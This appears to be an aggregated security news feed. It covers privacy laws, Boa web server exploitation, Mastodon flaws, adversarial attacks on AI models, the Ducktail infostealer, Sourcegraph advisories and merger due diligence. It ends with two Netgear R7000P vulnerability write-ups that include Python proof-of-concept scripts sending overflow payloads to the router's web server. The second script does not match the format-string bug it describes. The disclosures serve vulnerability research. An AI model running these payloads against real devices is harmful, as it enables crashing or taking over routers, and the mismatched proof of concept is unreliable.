New laws have made the current US privacy landscape increasingly complex.

With 65% of the global population expected to have its personal data covered under modern privacy regulations by 2023, respecting data privacy has never been more critical. As an example, the introduction of the federal American Data Privacy and Protection Act (ADPPA), along with the recent passage of a patchwork of state-level privacy laws, has made the current US privacy landscape increasingly complex. This results in challenges for organizations, both in managing exploding volumes of data and understanding how specific data privacy regulations apply to them.

As businesses of all sizes try to remain on top of ever-changing data privacy laws and proactively monitor relevant rules, they should also be taking necessary steps to map where consumer and employment data lives, and the potential risks to that data. By bolstering cybersecurity defenses, organizations can be better prepared for data privacy regulations, now and in the future.

Let's remember why this has become so vital. First, consumers and employees are more informed than ever about personal rights and how data privacy regulations apply to them. This is an important and positive development, considering the dramatic increase in the risk of fines and litigation for noncompliance — one of the foundations necessary for protecting individual rights.

The convergence of personally identifiable information (PII) and protected health information (PHI) also represents data risks. For example, payment information from an insurance claim, along with an email address and other digital breadcrumbs found on the Internet, can be used to steal identities or result in data exfiltration. In addition, the adoption and long-term acceptance of hybrid work models can create challenges. Some organizations ask their employees very focused questions about behaviors and work-from-home arrangements for measuring productivity. Depending on the specific questions, there could be further privacy implications.

**Landscape of Confusion**

Given the vast varieties and jurisdictions of the current data privacy and protection regulations, there can be some confusion. For example, US companies located in North Dakota that conduct business domestically may be somewhat less preoccupied with rules that apply overseas. By contrast, for US organizations offering goods and services in the UK or EU, regulations such as the General Data Protection Regulation (GDPR) — along with the potential for penalties if they are breached — may well apply.

Additionally, in some organizations preconceptions related to the size of the company could cause compliance or regulatory issues, such as believing a company is too small for the data privacy regulations to apply. While it's true that most of the newer regulations focus on companies of a certain size, the actual sizing criteria may relate to a range of factors, such as the number of employees or annual revenue. Whether data privacy regulations apply or not might also depend on the volume of consumer information an organization handles.

The point is, every set of regulations has nuances, which is why it's important to understand both the relevance and boundaries of each. This should be monitored under regular review, particularly as organizations grow and regulations begin to apply where they didn't before. For instance, there have been recent developments around the new EU–UK Data Privacy Framework, also known as Privacy Shield 2.0, concerning intelligence activities.

A good rule of thumb is to follow best practices as soon as possible, so when the need for formal compliance arrives, everything is in place. The risk of getting it wrong is serious, with organizations potentially facing massive fines for non-compliance. That says nothing of the impact to brand reputation when a serious breach is revealed, including loss of consumer, employee, or investor confidence, where the effects can be prolonged and painful.

**Time for Federal Laws?**

New data privacy laws are being proposed on a regular basis. There are five US states set to have key regulations going into effect in 2023: California, Virginia, Colorado, Connecticut, and Utah. With 10% of US states to be covered by data privacy legislation by the end of next year, it's clear that a federal law would be useful.

In particular, federal legislation could play a critical role in aligning the US with other countries on the subject of data privacy. It would also provide vendors and users with much-needed clarity on how to use, store, and manage sensitive data. This alone would go a long way in clearing up the widespread confusion that abounds due to the existing patchwork of regulation. While the exact timing of federal legislation like the proposed ADPPA is unclear, it's not a matter of if, but when.

Overall, data and the laws that govern its protection exist within a rapidly evolving regulatory ecosystem. Further change — both domestically and internationally — is inevitable. Therefore, organizations must focus on the short- and long-term responsibilities of handling and safeguarding data. It's not just the right thing to do ethically and morally, it also represents sound decision making for the health of the business.

Where Are We Heading With Data Privacy Regulations?

Microsoft on Tuesday disclosed the intrusion activity aimed at Indian power grid entities earlier this year likely involved the exploitation of security flaws in a now-discontinued web server called Boa.
The tech behemoth's cybersecurity division said the vulnerable component poses a "supply chain risk that may affect millions of organizations and devices."
The findings build on a prior report

Microsoft on Tuesday disclosed the intrusion activity aimed at Indian power grid entities earlier this year likely involved the exploitation of security flaws in a now-discontinued web server called **Boa**.

The tech behemoth's cybersecurity division said the vulnerable component poses a "supply chain risk that may affect millions of organizations and devices."

The findings build on a prior report published by Recorded Future in April 2022, which delved into a sustained campaign orchestrated by suspected China-linked adversaries to strike critical infrastructure organizations in India.

The cybersecurity firm attributed the attacks to a previously undocumented threat cluster called Threat Activity Group 38. While the Indian government described the attack as unsuccessful "probing attempts," China denied it was behind the campaign.

The connections to China stem from the use of a modular backdoor dubbed ShadowPad, which is known to be shared among several espionage groups that conduct intelligence-gathering missions on behalf of the nation.

Although the exact initial infection vector used to breach the networks remains unknown, the ShadowPad implant was controlled by using a network of compromised internet-facing DVR/IP camera devices.

Microsoft said its own investigation into the attack activity uncovered Boa as a common link, assessing that the intrusions were directed against exposed IoT devices running the web server.

"Despite being discontinued in 2005, the Boa web server continues to be implemented by different vendors across a variety of IoT devices and popular software development kits (SDKs)," the company said.

"Without developers managing the Boa web server, its known vulnerabilities could allow attackers to silently gain access to networks by collecting information from files."

The latest findings once again underscore the supply chain risk arising out of flaws in widely-used network components, which could expose critical infrastructure to breaches via publicly-accessible devices running the vulnerable web server.

Microsoft further said it detected more than one million internet-exposed Boa server components worldwide in a single week, with significant concentrations in India.

The pervasive nature of Boa servers is attributed to the fact that they are integrated into widely-used SDKs, such as those from RealTek, which are then bundled with devices like routers, access points, and repeaters.

The complex nature of the software supply chain means that fixes from an upstream vendor may not trickle down to customers and that unresolved flaws could continue to persist despite firmware updates from downstream manufacturers.

Some of the high-severity bugs affecting Boa include CVE-2017-9833 and CVE-2021-33558, which, if successfully exploited, could enable malicious hacking groups to read arbitrary files, obtain sensitive information, and achieve remote code execution.

Weaponizing these unpatched shortcomings could further enable threat actors to glean more information about the targeted IT environments, effectively making way for disruptive attacks.

"The popularity of the Boa web server displays the potential exposure risk of an insecure supply chain, even when security best practices are applied to devices in the network," Microsoft said.

"As attackers seek new footholds into increasingly secure devices and networks, identifying and preventing distributed security risks through software and hardware supply chains, like outdated components, should be prioritized by organizations."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Hackers Exploiting Abandoned Boa Web Servers to Target Critical Industries

As the open source social media network grabs the spotlight as a Twitter replacement, researchers caution about vulnerabilities.

From an anonymous server collecting user information to configuration errors that create vulnerabilities, infosec experts are pointing out security holes in Mastodon, which, seen as a replacement for Twittern is experiencing massive user growth — and an increased scrutiny of its flaws.  

Unlike other social media apps, which have a central authority, Mastodon is a federation of servers that can communicate with each other but which are maintained and run separately by independent admins. That means different rules, different configurations, and sometimes different software versions could apply to different users and postings.

One of the most popular "instances" — the Mastodon term for individual servers/communities — for the cybersecurity community is infosec.exchange, and its members certainly scrutinize its configuration. Gareth Heyes (@gaz on infosec.exchange), a researcher at PortSwigger, uncovered an HTML injection vulnerability stemming from attributes of the specific software fork used.

In another example from a recent Security Week article, Lenin Alevski (@alevsk on infosec.exchange), a security software engineer at MinIO, pointed out a system misconfiguration that would allow him to download, modify, or delete everything in the instance's S3 cloud storage bucket.

Finally, researcher Anurag Sen (@hak1mlukha on infosec.exchange) discovered an anonymous server that was scraping Mastodon user data.

**Twitter Users Flock to Mastodon**

Until recently, Mastodon was considered part of the social-media underground, an alternative to Twitter created in 2016 as an escape hatch in the face of buyout rumors. When Elon Musk first agreed to buy the microblogging behemoth back in April, Mastodon gained 30,000 new users in a day, compared with a more typical growth of below 2,000 a day. But that's a drop in the bucket compared with the 135,000 new users who joined on Nov. 7.

"Treat the Fediverse and any Mastodon instance as a place to share information, connect, and collaborate in the same way you'd do those things in person in a town square or public coffee shop. In short, don't use Mastodon to send sensitive, personal, or private information you wouldn't be comfortable posting publicly anyway," said Melissa Bischoping, director and endpoint security research specialist at Tanium, via email.

"Aside from the code, the way Mastodon is segmented means one or two people who administer a particular instance are the weak link in the security model," added David Maynor, senior director of threat intelligence at Cybrary. "My moving advice is firmly 'buyer beware.'"

Of course, Twitter is no stranger to security issues, so _caveat emptor_ is timeless and universal.

Cybersecurity Pros Put Mastodon Flaws Under the Microscope

An AI's "world" only includes the data on which it was trained, so it otherwise lacks context — opening the door for creative attacks from cyber adversaries.

Artificial intelligence and machine learning (AI/ML) systems trained using real-world data are increasingly being seen as open to certain attacks that fool the systems by using unexpected inputs.

At the recent Machine Learning Security Evasion Competition (MLSEC 2022), contestants successfully modified celebrity photos with the goal of having them recognized as a different person, while minimizing obvious changes to the original images. The most common approaches included merging two images — similar to a deepfake — and inserting a smaller image inside the frame of the original.

In another example, researchers from the Massachusetts Institute of Technology (MIT), University of California at Berkeley, and FAR AI found that a professional-level Go AI — that is, for the ancient board game — could be trivially beaten with moves that convinced the machine that the game had completed. While the Go AI could defeat a professional or amateur Go player because they used a logical set of movies, an adversarial attack could easily beat the machine by making decisions that no rational player would normally make.

These attacks highlight that while AI technology may work at superhuman levels and even be extensively tested in real-life scenarios, it continues to be vulnerable to unexpected inputs, says Adam Gleave, a doctoral candidate in artificial intelligence at the University of California at Berkeley, and one of the primary authors of the Go AI paper.

"I would default to assuming that any given machine learning system is insecure," he says. "\[W\]e should always avoid relying on machine learning systems, or any other individual piece of code, more than is strictly necessary \[and\] have the AI system recommend decisions but have a human approve them prior to execution."

All of this underscores a fundamental problem: Systems that are trained to be effective against "real-world" situations — by being trained on real-world data and scenarios — may behave erratically and insecurely when presented with anomalous, or malicious, inputs.

The problem crosses applications and systems. A self-driving car, for example, could handle nearly every situation that a normal driver might encounter while on the road, but act catastrophically during an anomalous event or one caused by an attacker, says Gary McGraw, a cybersecurity expert and co-founder of the Berryville Institute of Machine Learning (BIML).

"The real challenge of machine learning is figuring out how to be very flexible and do things as they are supposed to be done usually, but then to react correctly when an anomalous event occurs," he says, adding: "You typically generalize to what experts do, because you want to build an expert ... so it's what clueless people do, using surprise moves ... that can cause something interesting to happen."

**Fooling AI (And Users) Isn't Hard**

Because few developers of machine learning models and AI systems focus on adversarial attacks and using red teams to test their designs, finding ways to cause AI/ML systems to fail is fairly easy. MITRE, Microsoft, and other organizations have urged companies to take the threat of adversarial AI attacks more seriously, describing current attacks through the Adversarial Threat Landscape for Artificial-Intelligence Systems (ATLAS) knowledge base and noting that research into AI — often without any sort of robustness or security designed in — has skyrocketed.

Part of the problem is that non-experts who do not understand the mathematics behind machine learning often believe that the systems understand context and the world in which it operates. 

Large models for machine learning, such as the graphics-generating DALL-e and the prose-generating GPT-3, have massive data sets and emergent models that appear to result in a machine that reasons, says David Hoelzer, a SANS Fellow at the SANS Technical Institute. 

Yet, for such models, their "world" includes only the data on which they were trained, and so they otherwise lack context. Creating AI systems that act correctly in the face of anomalies or malicious attacks requires threat modeling that takes into account a variety of issues.

"In my experience, most who are building AI/ML solutions are not thinking about how to secure the ... solutions in any real ways," Hoelzer says. "Certainly, chatbot developers have learned that you need to be very careful with the data you provide during training and what kinds of inputs can be permitted from humans that might influence the training so that you can avoid a bot that turns offensive."

At a high level, there are three approaches to an attack on AI-powered systems, such as those for image recognition, says Eugene Neelou, technical director for AI safety at Adversa.ai, a firm focused on adversarial attacks on machine learning and AI systems.

Those are: embedding a smaller image inside the main image; mixing two sets of inputs — such as images — to create a morphed version; or adding specific noise that causes the AI system to fail in a specific way. This last method is typically the least obvious to a human, while still being effective against AI systems.

In a black-box competition to fool AI systems run by Adversa.ai, all but one contestant used the first two types of attacks, the firm stated in a summary of the contest results. The lesson is that AI algorithms do not make systems harder to attack, but easier because they increase the attack surface of regular applications, Neelou says.

"Traditional cybersecurity cannot protect from AI vulnerabilities — the security of AI models is a distinct domain that should be implemented in organizations where AI/ML is responsible for mission-critical or business-critical decisions," he says. "And it's not only facial recognition — anti-fraud, spam filters, content moderation, autonomous driving, and even healthcare AI applications can be bypassed in a similar way."

**Test AI Models for Robustness**

Like other types of brute-force attacks, rate limiting the number of attempted inputs can also help the creators of AI systems prevent ML attacks. In attacking the Go system, UC Berkeley's Gleave and the other researchers built their own adversarial system, which repeatedly played games against the targeted system, raising the victim AI's difficulty level as the adversary became increasingly successful.

The attack technique underscores a potential countermeasure, he says.

"We assume the attacker can train against a fixed 'victim' agent for millions of time steps," Gleave says. "This is a reasonable assumption if the 'victim' is software you can run on your local machine, but not if it's behind an API, in which case you might get detected as being abusive and kicked off the platform, or the victim might learn to stop being vulnerable over time — which introduces a new set of security risks around data poisoning but would help defend against our attack."

Companies should continue following security best practices, including the principle of least privilege — don't give workers more access to sensitive systems than they need or rely on the output of those systems more than necessary. Finally, design the entire ML pipeline and AI system for robustness, he says.

"I'd trust a machine learning system more if it had been extensively adversarially tested, ideally by an independent red team, and if the designers had used training techniques known to be more robust," Gleave says.

Adversarial AI Attacks Highlight Fundamental Security Issues

The Vietnam-based financial cybercrime operation's primary goal is to push out fraudulent ads via compromised business accounts.

A financially motivated threat actor targeting individuals and organizations on Facebook's Ads and Business platform has resumed operations after a brief hiatus, with a new bag of tricks for hijacking accounts and profiting from them.

The Vietnam-based threat campaign, dubbed Ducktail, has been active since at least May 2021 and has affected users with Facebook business accounts in the United States and more than three dozen other countries. Security researchers from WithSecure (formerly F-Secure) who are tracking Ducktail have assessed that the threat actor's primary goal is to push out ads fraudulently via Facebook business accounts to which they manage to gain control.

**Evolving Tactics**

WithSecure spotted Ducktail's activity earlier this year and disclosed details of its tactics and techniques in a July blog post. The disclosure forced Ducktail's operators to suspend operations briefly while they devised new methods for continuing with their campaign.

In September, Ducktail resurfaced with changes to the way it operates and to its mechanisms for evading detection. Far from slowing down, the group appears to have expanded its operations, onboarding multiple affiliate groups to its campaign, WithSecure said in a report on Nov. 22.

In addition to using LinkedIn as an avenue for spear-phishing targets, as it did in previous campaigns, the Ducktail group has now begun using WhatsApp for targeting users as well. The group has also tweaked the capabilities of its primary information stealer and has adopted a new file format for it, to evade detection. Over the course of the last two or three months, Ducktail also has registered multiple fraudulent companies in Vietnam, apparently as a cover for obtaining digital certificates for signing its malware.

"We believe the Ducktail operation uses hijacked business account access purely to make money by pushing out fraudulent ads," says Mohammad Kazem Hassan Nejad, a researcher at WithSecure Intelligence. 

In situations where the threat actor gains access to the finance editor role on a compromised Facebook business account, they also have the ability to modify business credit card information and financial details, such as transactions, invoices, account spending, and payment methods, Nejad says. This would allow the threat actor to add other businesses to the credit card and monthly invoices, and use the linked payment methods to run ads.

"The hijacked business could therefore be used for purposes such as advertising, fraud, or even to spread disinformation," Nejad says. "The threat actor could also use their newfound access to blackmail a company by locking them out of their own page."

**Targeted Attacks**

The tactic of Ducktail's operators is to first identify organizations that have a Facebook Business or Ads account and then target individuals within those companies whom they perceive as having high-level access to the account. Individuals the group has typically targeted include people with managerial roles or roles in digital marketing, digital media, and human resources. 

The attack chain starts with the threat actor sending the targeted individual a spear-phishing lure via LinkedIn or WhatsApp. Users who fall for the lure end up having Ducktail's information stealer installed on their system. The malware can carry out multiple functions, including extracting all stored browser cookies and Facebook session cookies from the victim machine, specific registry data, Facebook security tokens, and Facebook account information. 

The malware steals a wide range of information on all businesses associated with the Facebook account, including name, verification stats, ad spending limits, roles, invite link, client ID, ad account permissions, permitted tasks, and access status. The malware collects similar information on any ad accounts associated with the compromised Facebook account.

The information stealer can "steal information from the victim's Facebook account and hijack any Facebook Business account to which the victim has sufficient access by adding attacker-controlled email addresses into the business account with administrator privileges and finance editor roles," Nejad says.  Adding an email address to a Facebook Business account prompts Facebook to send a link via email to that address — which, in this case, is controlled by the attacker. The threat actor uses that link to gain access to the account, according to WithSecure.

Threat actors with admin access to a victim's Facebook account can do a lot of damage, including taking full control of the business account; viewing and modifying settings, people, and account details; and even deleting the business profile outright, Nejad says. When a targeted victim might not have sufficient access to allow the malware to add the threat actor’s email addresses, the threat has actor relied on the information exfiltrated from the victims’ machines and Facebook accounts to impersonate them.

**Building Smarter Malware**

Nejad says that prior versions of Ducktail's information stealer contained a hard-coded list of email addresses to use for hijacking business accounts. 

"However, with the recent campaign, we observed the threat actor removing this functionality and relying entirely on fetching email addresses directly from its command-and-control channel (C2)," hosted on Telegram, the researcher says. Upon launch, the malware establishes a connection to the C2 and waits for a duration of time to receive a list of attacker-controlled email addresses in order to proceed, he adds.

The report lists several steps that organization can take to mitigate exposure to Ducktail-like attack campaigns, beginning with raising awareness of spear-phishing scams targeting users with access to Facebook business accounts. 

Organizations should also enforce application whitelisting to prevent unknown executables from running, ensure that all managed or personal devices used with company Facebook accounts have basic hygiene and protection in place, and use private browsing to authenticate each work session when accessing Facebook Business accounts.

Ducktail Cyberattackers Add WhatsApp to Facebook Business Attack Chain

Sourcegraph is a code intelligence platform. In versions prior to 4.1.0 a command Injection vulnerability existed in the gitserver service, present in all Sourcegraph deployments. This vulnerability was caused by a lack of input validation on the host parameter of the `/list-gitolite` endpoint. It was possible to send a crafted request to gitserver that would execute commands inside the container. Successful exploitation requires the ability to send local requests to gitserver. The issue is patched in version 4.1.0.

**Impact**

A Command Injection vulnerability existed in the gitserver service, present in all Sourcegraph deployments. This vulnerability was caused by a lack of input validation on the host parameter of the /list-gitolite endpoint. It was possible to send a crafted request to gitserver that would execute commands inside the container.

Successful exploitation requires the ability to send local requests to gitserver.

**Patches**

The issue is patched in version 4.1.0.

**References**

*   #42553

**For more information**

If you have any questions or comments about this advisory email us at security@sourcegraph.com

CVE-2022-41942: Command Injection in gitserver

sourcegraph is a code intelligence platform. As a site admin it was possible to execute arbitrary commands on Gitserver when the experimental `customGitFetch` feature was enabled. This experimental feature has now been disabled by default. This issue has been patched in version 4.1.0.

**Conversation**

 evict mentioned this pull request

Oct 7, 2022

evict and others added 7 commits

Oct 14, 2022

 

\* switch to enable rather than disable env var

\* add changelog entry

Co-authored-by: Vincent Ruijter <vincent.ruijter@sourcegraph.com>

 evict deleted the vincent/optional-disable-custom-git-fetch branch

Oct 14, 2022

vovakulikov pushed a commit that referenced this pull request

Oct 17, 2022

\* add env var for disabling customGitFetch

Co-authored-by: Warren Gifford <warren@sourcegraph.com>
Co-authored-by: Dax McDonald <dax@sourcegraph.com>

CVE-2022-41943: Add optional switch for disabling custom git fetch by evict · Pull Request #42704 · sourcegraph/sourcegraph

To get the full picture, companies need to look into the cybersecurity history and practices of the business they're acquiring.

Imagine getting ready to spend billions of dollars on an acquisition, only to find out that the target of the acquisition was the victim of multiple cyberattacks affecting billions of accounts. One would think such a scenario would be a huge red flag that no corporate board or general counsel would ever forget, regardless of the size of the acquisition, but that clarion call does not seem to be heard universally.

That's what happened around the 2017 revelation of the massive breach of Yahoo uncovered by its sale to Verizon, and it cost the search engine company a $400 million hit to its purchase price. Apparently, however, cybersecurity and related technological components are still relatively low on the essential due diligence checklist.

The right time to start evaluating the cybersecurity risk profile of an acquisition target, experts agree, is early on in the due diligence process. Too often due diligence is limited to balance sheets, sales operations, and outstanding legal obligations, with cybersecurity, compliance, and technical compatibility of security tools left to the end of the discussion, if they are discussed at all.

"The value of pre-sign due diligence is to make sure that companies are assessing all the relevant risks before they sign on the dotted line," says John Hauser, principal and cyber due diligence leader at Ernst & Young, as well as a former FBI special agent and a former assistant United States Attorney. "Cyber can be a major factor in deciding whether or not a client decides to walk away" from a merger or acquisition.

Early cyber due diligence allows a potential suitor to "negotiate better terms through the purchase price reductions, or indemnities, or other contractual provisions," he adds.

In conjunction with the traditional business due diligence, companies are turning to threat intelligence experts to evaluate the prospective target's risk profile, looking for evidence that the company might have been breached with data for sale on the Dark Web or perhaps has weak controls on other internal operations. Using open source intelligence (OSINT), he said, investigators often can find evidence of a breach, such as indicators of leaked credentials, communications between the target company infrastructure and any known malware families and command and control servers, or other insights.

Other significant intelligence can be gleaned by asking the target company to provide data such as attestations made to a cyber insurance provider, source code, penetration test results, and past compliance reports. 

"You're starting to see more technical verification, moving into the pre-sign phase," Hauser says.

**Assessing Vulnerabilities**

Cyber criminals often watch mergers and acquisitions activity, looking for a potentially weak target being acquired by a stronger company, especially one that might have a lot of valuable information for the cybercrooks, notes Heather Clauson Haughian, founder and managing partner at the Atlanta-based law firm Culhane Meadows. Once the acquisition goes through, it would not be uncommon for the target firm to get attacked with the hopes of breaching a weak link and thus accessing the more lucrative part of the merged companies.

Another vulnerability occurs when organizations with differing compliance requirements join, Haughian says. While the acquiring organization might be well versed in its own compliance reporting requirements, it might not have the same expertise with the company it acquires.

If the acquiring company does not employ compliance experts for the acquired company's operations, there could be a gap in compliance reporting, along with missed opportunities to layer security controls over the acquired company, leaving it vulnerable to a cyberattack, she says.

In such cases, using a third-party advisory service is recommended, says Shay Colson, managing partner of cyber diligence at Bellingham, Washington-based firm Coastal Cyber Risk Advisors. A company executing a bolt-on, add-on, or tuck-in acquisition can have its third-party adviser evaluate the target's security posture, including what its program looks like, strengths and weaknesses, and existing security tool sets. 

"Then you can get views on the targets that are both objective to the target and deal with this integration challenge," he says.

**Taking Responsibility**

Ultimately, general counsels need to come up to speed as quickly as possible on cyber risk and cybersecurity. "They are going to be the ones who own cyber risk at their enterprise because if there's an incident, they're calling outside counsel, they're coordinating forensics, and they're looking at regulatory response obligations," Colson says.

"I think the more proactive \[general counsels\] are, \[they are\] going to realize that cyber risk is a place where they can actually drive value to the business and enable things," he adds. "It's just a matter of time before more and more GCs get on board with that."

EY's Hauser said that SEC Chairman Gary Gensler's recent proposed rules for public companies and other financial services organizations could help boards of directors to navigate through the cybersecurity due diligence challenges.

There is a consensus that there is a growing risk of cybercrimes and that boards need to pay greater attention to it, he said. Courts and regulators are making it explicitly clear that failing to do proper cyber due diligence makes it easier for a future plaintiff to accuse a board member of negligence. That, combined with Gensler's proposed rules that put more personal responsibility on C-suites and board members, and you have the perfect storm for cybersecurity experts to take a more active role in board-level decisions, he notes.

Cyber Due Diligence in M&As Uncovers Threats, Improves Valuations

Netgear R7000P V1.3.0.8, V1.3.1.64 is vulnerable to Buffer Overflow via parameters: stamode_dns1_pri and stamode_dns1_sec.

**Netgear R7000P has a Stack Buffer Overflow Vulnerability****Product**

1.  product information: https://www.netgear.com
2.  firmware download: http://www.downloads.netgear.com/files/GDC/R7000P/R7000P-V1.3.0.8\_1.0.93.zip

http://www.downloads.netgear.com/files/GDC/R7000P/R7000P-V1.3.1.64\_10.1.36.zip

**Affected version**

V1.3.0.8, V1.3.1.64

**Vulnerability**

The stack overfow vulnerability is in /usr/sbin/httpd. The vulnerability occurrs in the sub_62A2C function, which can be accessed via the URL http://routerlogin.net/DIG_reboot_wireless.htm.

In this function, stamode_dns1_pri is controllable and will be passed into the v109 variable and v109 will be passed into stack s by sprintf. It is worth noting that there is no size check, which leads to a stack overflow vulnerability.

Also, stamode_dns1_sec is controllable and will be passed into the v108 variable and v108 will be passed into stack s by sprintf. It is worth noting that there is no size check, which leads to a stack overflow vulnerability.

**PoC**

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80
r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)
r.connect((ip, port))
rn \= b'\\r\\n'
p1 \= b'a' \* 0x3000
p2 \= b'stamode\_dns1\_pri=' + p1 \# payload
p3 \= b"POST /WLG\_wireless\_dual\_band\_r10.html" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2

r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

CVE-2022-44200: IoT_vuln/Netgear/R7000P/17 at main · RobinWang825/IoT_vuln

Netgear R7000P V1.3.1.64 is vulnerable to Buffer Overflow via parameter enable_band_steering.

The stack overfow vulnerability is in /usr/sbin/httpd. The vulnerability occurrs in the sub_5835C function, which can be accessed via the URL http://routerlogin.net/WLG_wireless_dual_band_r10.htm.

Parameter enable_band_steering, is controllable and will be formatted by printf for the print output. . Users can control formatting instructions, and attackers can use this capability to expose or overwrite memory values and compromise program security.

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80
r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)
r.connect((ip, port))
rn \= b'\\r\\n'
p1 \= b'a' \* 0x3000
p2 \= b'enable\_band\_steering=' + p1 \# payload
p3 \= b"POST /WLG\_wireless\_dual\_band\_r10.html" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2

r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

Tag

#intel